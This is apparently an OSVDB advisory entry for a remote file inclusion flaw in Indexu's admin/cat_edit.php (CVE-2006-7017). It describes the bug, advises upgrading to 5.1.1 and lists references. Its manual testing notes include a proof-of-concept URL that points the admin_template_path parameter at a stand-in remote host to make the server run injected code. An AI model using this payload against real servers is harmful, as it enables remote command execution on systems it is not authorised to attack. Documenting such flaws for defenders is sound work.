Indexu admin/cat_edit.php admin_template_path Variable Remote File Inclusion

2006-06-16T00:00:00
ID OSVDB:39353
Type osvdb
Reporter OSVDB
Modified 2006-06-16T00:00:00

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin/cat_edit.php not properly sanitizing user input supplied to the 'admin_template_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/indexu/admin/cat_edit.php?admin_template_path=http://evilcode.txt?

References:

Vendor URL: http://www.nicecoder.com/ Security Tracker: 1016330 Secunia Advisory ID:18752 Related OSVDB ID: 39355 Related OSVDB ID: 39353 Related OSVDB ID: 1018037 Related OSVDB ID: 1018038 Related OSVDB ID: 1018039 Related OSVDB ID: 1018041 Related OSVDB ID: 1018043 Related OSVDB ID: 1018044 Related OSVDB ID: 1018046 Related OSVDB ID: 1018047 Related OSVDB ID: 1018052 Related OSVDB ID: 1018058 Related OSVDB ID: 1018061 Related OSVDB ID: 1018072 Related OSVDB ID: 1018074 Related OSVDB ID: 1018076 Related OSVDB ID: 1018077 Related OSVDB ID: 1018080 Related OSVDB ID: 1018082 Related OSVDB ID: 1018084 Related OSVDB ID: 1018089 Related OSVDB ID: 1018090 Related OSVDB ID: 1018033 Related OSVDB ID: 1018040 Related OSVDB ID: 1018053 Related OSVDB ID: 1018054 Related OSVDB ID: 1018055 Related OSVDB ID: 1018057 Related OSVDB ID: 1018067 Related OSVDB ID: 1018070 Related OSVDB ID: 1018073 Related OSVDB ID: 1018078 Related OSVDB ID: 1018086 Related OSVDB ID: 1018032 Related OSVDB ID: 39354 Related OSVDB ID: 1018042 Related OSVDB ID: 1018056 Related OSVDB ID: 1018059 Related OSVDB ID: 1018060 Related OSVDB ID: 1018063 Related OSVDB ID: 1018064 Related OSVDB ID: 1018065 Related OSVDB ID: 1018071 Related OSVDB ID: 1018081 Related OSVDB ID: 1018085 Related OSVDB ID: 1018087 Related OSVDB ID: 1018036 Related OSVDB ID: 1018045 Related OSVDB ID: 1018048 Related OSVDB ID: 1018049 Related OSVDB ID: 1018050 Related OSVDB ID: 1018051 Related OSVDB ID: 1018062 Related OSVDB ID: 1018066 Related OSVDB ID: 1018068 Related OSVDB ID: 1018069 Related OSVDB ID: 1018075 Related OSVDB ID: 1018079 Related OSVDB ID: 1018083 Related OSVDB ID: 1018088 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html ISS X-Force ID: 27262 CVE-2006-7017